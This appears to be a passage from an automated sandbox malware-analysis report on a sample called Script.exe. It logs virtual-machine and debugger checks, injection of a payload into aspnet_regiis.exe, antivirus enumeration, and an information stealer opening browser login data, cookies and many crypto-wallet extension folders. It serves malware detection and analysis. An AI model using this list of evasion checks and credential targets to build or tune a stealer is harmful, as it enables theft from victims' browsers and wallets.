              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: Script.exe PID: 7120, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory allocated: 4E70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory allocated: 54D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory allocated: 64D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory allocated: 6600000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory allocated: 7600000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory allocated: 7990000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory allocated: 8990000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory allocated: 9990000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 1440Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 3176Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0C4872 FindFirstFileExW,0_2_6E0C4872
              Source: Amcache.hve.6.drBinary or memory string: VMware
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2524886217.0000000002E45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Amcache.hve.6.drBinary or memory string: vmci.sys
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: Amcache.hve.6.drBinary or memory string: VMware20,1
              Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0C182A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E0C182A
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0C2FB5 mov eax, dword ptr fs:[00000030h]0_2_6E0C2FB5
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0C4189 mov eax, dword ptr fs:[00000030h]0_2_6E0C4189
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0C5D9C GetProcessHeap,0_2_6E0C5D9C
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0C1351 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E0C1351
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0C182A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E0C182A
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0C41BA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E0C41BA
              Source: C:\Users\user\Desktop\Script.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Script.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29E0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29E0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29E0000Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29E1000Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A22000Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A25000Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A35000Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A36000Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29E1000Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A22000Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A25000Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A35000Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A36000Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 717008Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0C19F8 cpuid 0_2_6E0C19F8
              Source: C:\Users\user\Desktop\Script.exeQueries volume information: C:\Users\user\Desktop\Script.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0C1473 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6E0C1473
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: aspnet_regiis.exe, 00000003.00000003.2278969823.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2524957712.0000000002E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s%\Windows Defender\MsMpeng.exe
              Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 768, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: aspnet_regiis.exeString found in binary or memory: Wallets/Electrum
              Source: aspnet_regiis.exeString found in binary or memory: Wallets/ElectronCash
              Source: aspnet_regiis.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: aspnet_regiis.exeString found in binary or memory: window-state.json
              Source: aspnet_regiis.exeString found in binary or memory: Wallets/Exodus
              Source: aspnet_regiis.exeString found in binary or memory: %appdata%\Ethereum
              Source: aspnet_regiis.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: aspnet_regiis.exeString found in binary or memory: keystore
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
